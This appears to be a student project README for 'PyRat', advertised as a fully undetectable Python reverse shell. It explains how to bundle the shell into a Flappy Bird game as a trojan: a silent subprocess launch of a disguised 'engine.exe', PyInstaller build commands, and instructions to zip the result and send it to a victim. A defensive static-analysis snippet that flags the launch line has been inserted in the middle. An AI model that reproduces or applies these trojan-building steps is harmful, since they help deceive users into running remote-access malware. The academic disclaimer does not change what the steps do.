PyRat

A Simple Python 3 Reverse Shell Script


PyRat: ReverseShell

A Fully Undetectable Python 3 Reverse Shell Script


Disclaimer

Developed by Gerard Ian M. Balaoro
In Partial Fulfillment of the Requirements for the Subject
LIS 198: Information Security
1st Semester, A.Y. 2018-2019
University of the Philippines Diliman

The author intended this to be used solely for academic purposes.


Usage

Building Binaries Using PyInstaller (Windows)

Building Trojan Executables (Windows)

Injecting the client script inside the parent entry script.

It’s fairly easy to integrate this script into any Python application. In this example, we will use this Flappy Bird game recreated by Sourabh Verma using the PyGame library.

All we need to do is execute the client script silently whenever the game is initialized. We also need to think of an unsuspicious name to use when compiling the client script; in this case, we’re using ‘engine.exe’. This can be accomplished using Python’s subprocess library:

import subprocess
payload = subprocess.Popen('engine', shell = True, stdout= None, stderr = None, stdin = None)
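
When reviewing a Python application's source before packaging or running it, the launch pattern above can be located statically. The following is an added example, not part of PyRat: the function name `find_shell_launches` and the sample source are constructed for illustration, and it only inspects calls that pass a literal `shell=True`.

```python
import ast

# Constructed sample: an entry script containing the launch line shown above.
SAMPLE = '''\
import subprocess
import pygame

payload = subprocess.Popen('engine', shell = True, stdout= None, stderr = None, stdin = None)
version = subprocess.run(["git", "describe"], capture_output=True)
'''

LAUNCHERS = {"Popen", "run", "call", "check_call", "check_output"}
STREAMS = ("stdout", "stderr", "stdin")


def _is_none(node):
    """True when a keyword is absent or set to the literal None."""
    return node is None or (isinstance(node, ast.Constant) and node.value is None)


def find_shell_launches(source):
    """Return sorted (line, function, command, quiet) for subprocess-style
    calls made with shell=True. quiet means no stream is redirected, so
    the parent never captures or inspects the child's output."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", None)
        if name not in LAUNCHERS:
            continue
        kwargs = {kw.arg: kw.value for kw in node.keywords if kw.arg}
        shell = kwargs.get("shell")
        if not (isinstance(shell, ast.Constant) and shell.value is True):
            continue
        cmd = node.args[0] if node.args else kwargs.get("args")
        literal = isinstance(cmd, ast.Constant) and isinstance(cmd.value, str)
        command = cmd.value if literal else "<dynamic>"
        quiet = all(_is_none(kwargs.get(k)) for k in STREAMS)
        findings.append((node.lineno, name, command, quiet))
    return sorted(findings)


if __name__ == "__main__":
    for line, name, command, quiet in find_shell_launches(SAMPLE):
        print(f"line {line}: {name}({command!r}, shell=True) quiet={quiet}")
```

A finding with a short relative command name and `quiet=True` is worth tracing to the file it resolves to in the shipped package.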

Building the Game Package

Run pyinstaller and copy the assets folder to the destination:

pyinstaller flappy.py -F -y -i assets/icons/flappy.ico --distpath "dist/FlappyBird" --name "flappybird" --windowed
xcopy "assets" "dist/FlappyBird/assets" /E /S /Y

Once done, we can see our Trojan application inside the dist/FlappyBird directory. All that’s left to do is to change the configuration settings, compress this to a zip file and send it to a victim.

.
├── ...
├── config.ini  # Server settings
├── engine.exe  # Concealed payload
├── flappybird.exe 
└── ...

Credits